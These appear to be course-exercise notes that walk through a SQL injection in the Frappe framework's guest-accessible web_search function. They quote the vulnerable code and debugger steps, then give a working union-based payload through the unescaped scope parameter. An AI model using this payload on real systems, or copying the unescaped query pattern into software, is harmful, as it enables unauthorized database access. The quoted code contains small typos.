# SQL Injection

Continuing from the previous section, we’ll search for whitelisted, guest-accessible functions in the code, `@frappe.whitelist(allow_guest=True)`. Within these, we can check for any SQL being executed, leading us to the `web_search`function in `apps/frappe/frappe/utils/global_search.py`. 

In this function, the `text` variable is split into a list of multiple search strings by the character `&`, and loops through these search strings. The text is then passed into the `frappe.db.escape` function, and then appended into the query with the `format` function. However, while the `text` function is escaped when added, the other attributes `scope, start and limit` are not. As such, they are vulnerable to SQL injection. 

```python
@frappe.whitelist(allow_guest=True):
def web_search(text, scope=None, start=0, limit=20):
	results = []
	texts = text.split('&')
	for text in texts:
			common_query = '''SELECT `doctype`, `name`, `content`, `title`, `route` FROM 
									FROM __global_search WHERE {conditions} LIMIT {limit} OFFSET {start}'''
			scope_condition = '`route` like "{}%" AND '.format(scope) if scope else ''
			published_condition = '`published` = 1 AND '
			mariadb_conditions = postgres_coditions = ''.join([pubished_condition, scope_condition])
			
			text = '"{}"'.format(text)
			mariadb_conditions  += 'MATCH(`content`) AGAINST ({} IN BOOLEAN MODE)'.format(frappe.db.escape(text))
			postgres_conditions += 'TO_TSVECTOR("content") @@ PLAINTO_TSQUERY({})'.format(frappe.db.escape(text))
			
			result = frappe.db.multisql({
				'mariadb': common_query.format(conditions=mariadb_conditions, limit=limit, start=start),
				'postgres': common_query.format(conditions=postgres_conditions, limit=limit, start=start)
			}, as_dict = True)
```

We can set a breakpoint on the `web_search` function and then send a test command  to`frappe.utils.global_search.web_search&text=offsec`. Setting a breakpoint allows us to look into the query just before it is executed by the `multisql` function.

We can then `step over` (to line 420), and then `step in`to the `mutlisql` function, taking us to the `database/database.py` file.  From here, we can expand the `sql_dict` variable and examine the SQL query, getting the cleaned-up version of the SQL query. We can also insert other attributes like scope, start and limit, which modifies the query. The query will also be displayed in our MySQL logging page, giving us additional verification. 

```python
SELECT `doctype`, `name`, `content`, `title`, `route`
  FROM `__global_search`
  WHERE `published` = 1 AND  MATCH(`content`) AGAINST ('\"offsec\"' IN BOOLEAN MODE)
  LIMIT 20 OFFSET 0
```

When we set the other variables, we find an additional `like "test_scope%"` attribute inserted into the query. Unlike the escaped `text` parameter, our `scope` parameter is inserted as in, and hence be used to perform a union-based SQL injection by:

1.  Terminating the double quotes
2. Adding a UNION statement
3. Commenting out the remaining command. 

```sql
SELECT `doctype`, `name`, `content`, `title`, `route`
FROM `__global_search`
WHERE `published` = 1 AND  `route` like "test_scope%" AND MATCH(`content`) AGAINST ('offsec' IN BOOLEAN MODE)
LIMIT test_limit OFFSET test_start
```

Since the SQL query has 5 parameters, we know that the union injection should have 5 parameters. SQL Injection payload:

```python
test_scope" UNION ALL SELECT 1,2,3,4,5#
```

This leads to the query

```sql
Query SELECT `doctype`, `name`, `content`, `title`, `route`
FROM `__global_search`
WHERE `published` = 1 AND  `route` like "test_scope" UNION ALL SELECT 1,2,3,4,5
#%" AND MATCH(`content`) AGAINST ('\"offsec\"' IN BOOLEAN MODE)
```

Now, we can extract information like the database version by replacing one of the values with `@@version`

## Exercise 8.3.1.2

*Attempt to discover how the web_search function is used in the UI. Would it have been
possible to discover this kind of vulnerability in a black box assessment?*

Either through code review or through FFUF and page inspection, we find that the `web_search` function is invoked from the `get_search_results` function, another guest-accessible whitelisted function. Tracing back further, the `get_search_results` function is invoked from a `search.html` page, which invokes the function through `frappe.www.search.get_search_results`. Navigating to this page on our web browser (or discovering it through FFUF of common extensions like `.html`, we find the UI interface where the `web_search` function is used.